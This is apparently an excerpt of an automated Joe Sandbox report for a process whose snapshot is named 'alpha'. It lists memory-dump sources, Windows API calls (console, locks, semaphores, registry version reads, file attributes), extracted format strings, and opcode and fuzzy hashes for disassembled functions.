                                                                                                          • String ID:
                                                                                                          • API String ID: 4057327938-0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                          • String ID: KEYS$LIST$OFF
                                                                                                          • API String ID: 411561164-4129271751
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB130212
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB130228
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB13023C
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB130251
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 513048808-0
                                                                                                          • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                          • Instruction ID: 31079997c629a2ed2679cecaec16271bc86c2216dd27545dfce522d4f86a2591
                                                                                                          • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                          • Instruction Fuzzy Hash: A3217F3190E68287E6966B6CF588338EAD0FB4975DF964235D91F436B0EF7CD4488720
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 513048808-0
                                                                                                          • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                          • Instruction ID: 19cefe89adc57d74a72b005c31f62415baaebb1870e53760679bdcdb7ee5fb1a
                                                                                                          • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                          • Instruction Fuzzy Hash: 2A116631A0A64286EA556B2CF584078EA90FF4A77DF966335D92F433F0EE3CD4888710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104442557-0
                                                                                                          • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                          • Instruction ID: 456b2dd6a680bf054ad0d54fb98d15e66760bb88230766a7d0a192db98420bf4
                                                                                                          • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                          • Instruction Fuzzy Hash: EB112421B06B418AEB01EF78F8841A873A4F75975CF810A34EA6E47774EF7CD5A48350
                                                                                                          APIs
                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1471F9
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB14720D
                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB147300
                                                                                                            • Part of subcall function 00007FF7AB145740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7AB1475C4,?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB145744
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                          • String ID: _p0$wil
                                                                                                          • API String ID: 455305043-1814513734
                                                                                                          • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                          • Instruction ID: d6dc1d64aa8de0221e91a377947d8b262fb8cabd7982f9d04b78478966d7309b
                                                                                                          • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                          • Instruction Fuzzy Hash: F561C4A2B1A64281EE26AF5DE4506B9A3D1FF44B88FC64531D90E47775FF3CD5058320
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                          • String ID: %s
                                                                                                          • API String ID: 2401724867-3043279178
                                                                                                          • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                          • Instruction ID: 3faaac2c4f6b15b076513014651d2813cb13cea8fa62761c423ffe1009e3505c
                                                                                                          • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                          • Instruction Fuzzy Hash: 9451E772B0A68285EB22AF19F8402B9B3A0FB4978CF864134D95D077B4EF3CD455C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          • API String ID: 3849470556-1994581435
                                                                                                          • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                          • Instruction ID: 8fd81ccb908bf0893e0898e5b79b205ee9f09b7a11ba35c19071416c6c15e541
                                                                                                          • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                          • Instruction Fuzzy Hash: 6A518A32A0A642C5EB66AF1DF444679B7A4FB44B18F868435DA4D433B0EF7DE884C760
                                                                                                          APIs
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB149A10
                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB149994
                                                                                                            • Part of subcall function 00007FF7AB14A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A77A
                                                                                                            • Part of subcall function 00007FF7AB14A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A839
                                                                                                            • Part of subcall function 00007FF7AB14A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A850
                                                                                                          • wcsrchr.MSVCRT ref: 00007FF7AB149A62
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                          • String ID: %s=%s$.
                                                                                                          • API String ID: 3242694432-4275322459
                                                                                                          • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                          • Instruction ID: c29bd38e525ec606419cc93c7ee398349b66e6168f8c911a398380d5a8d882a8
                                                                                                          • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                          • Instruction Fuzzy Hash: 8941A161A0A7428AEA16BB19F0502B9E291FF857E8F968630DD5D077F5FE3CE4458320
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1454E6
                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB14552E
                                                                                                            • Part of subcall function 00007FF7AB14758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475AE
                                                                                                            • Part of subcall function 00007FF7AB14758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475C6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                          • API String ID: 779401067-630742106
                                                                                                          • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                          • Instruction ID: 068108f11691cd38fb69f9a504f75309029438aa0c5074cee22e65278b6afdfe
                                                                                                          • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                          • Instruction Fuzzy Hash: A75185B261968281EB12AB19F4407FAE761FF8478CFD24031EA4D8BA75EE7DD505C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectorytowupper
                                                                                                          • String ID: :$:
                                                                                                          • API String ID: 238703822-3780739392
                                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                          • Instruction ID: b32249fd8902427561cef4e95d1912c07f66a50c8e469a3ca7b8610c069ec178
                                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                          • Instruction Fuzzy Hash: B611E65260A74185EB1AAB69F405279F6A0FF4979DF868132DD0D07770EF3CE0458724
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                          • Instruction ID: 1cbb613715ebb9b8ff69e808273d2b6720aa2aa1e8b704bb7edb11b3f315389a
                                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                          • Instruction Fuzzy Hash: 3A110A7661AA41C7EB119B58F48466AF7A4FB89768F814235DA8D0377CDF7CD048CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 110935159-0
                                                                                                          • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                          • Instruction ID: 3e71a80c6363e39b8fa977fa23fabc4189ef155862b23c78e5e4b0753237e03c
                                                                                                          • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                          • Instruction Fuzzy Hash: D551D862B0A78685FE22AB19F4003F9D290BF59BACF964531CE5D4B7B4EE3CD5458310
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 1403193329-0
                                                                                                          • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                          • Instruction ID: 8c590ac0c0a440f8491318cabe8cce9bfcb42fcc233c2ad99c2eeba23fd4e69e
                                                                                                          • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                          • Instruction Fuzzy Hash: 4D51992760B68185EB6AAF28E4456B9B7A0FF4575CFC68135CA0D076B4FF3CD5488720
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00007FF7AB12921C
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB1293AA
                                                                                                            • Part of subcall function 00007FF7AB128B20: wcsrchr.MSVCRT ref: 00007FF7AB128BAB
                                                                                                            • Part of subcall function 00007FF7AB128B20: _wcsicmp.MSVCRT ref: 00007FF7AB128BD4
                                                                                                            • Part of subcall function 00007FF7AB128B20: _wcsicmp.MSVCRT ref: 00007FF7AB128BF2
                                                                                                            • Part of subcall function 00007FF7AB128B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB128C16
                                                                                                            • Part of subcall function 00007FF7AB128B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB128C2F
                                                                                                            • Part of subcall function 00007FF7AB128B20: wcschr.MSVCRT ref: 00007FF7AB128CB3
                                                                                                            • Part of subcall function 00007FF7AB13417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB1341AD
                                                                                                            • Part of subcall function 00007FF7AB133060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7AB1292AC), ref: 00007FF7AB1330CA
                                                                                                            • Part of subcall function 00007FF7AB133060: SetErrorMode.KERNELBASE ref: 00007FF7AB1330DD
                                                                                                            • Part of subcall function 00007FF7AB133060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB1330F6
                                                                                                            • Part of subcall function 00007FF7AB133060: SetErrorMode.KERNELBASE ref: 00007FF7AB133106
                                                                                                          • wcsrchr.MSVCRT ref: 00007FF7AB1292D8
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB129362
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB129373
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3966000956-0
                                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                          • Instruction ID: 4c29e2c0e65bb5c412cde1a0a44283279456eeb7e989095de1142ca1060ecd17
                                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                          • Instruction Fuzzy Hash: 7A51A632A0A682C5EB66AF29F4502B9B3A0FF49798F864035DA4D077B5EF3CE555C310
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
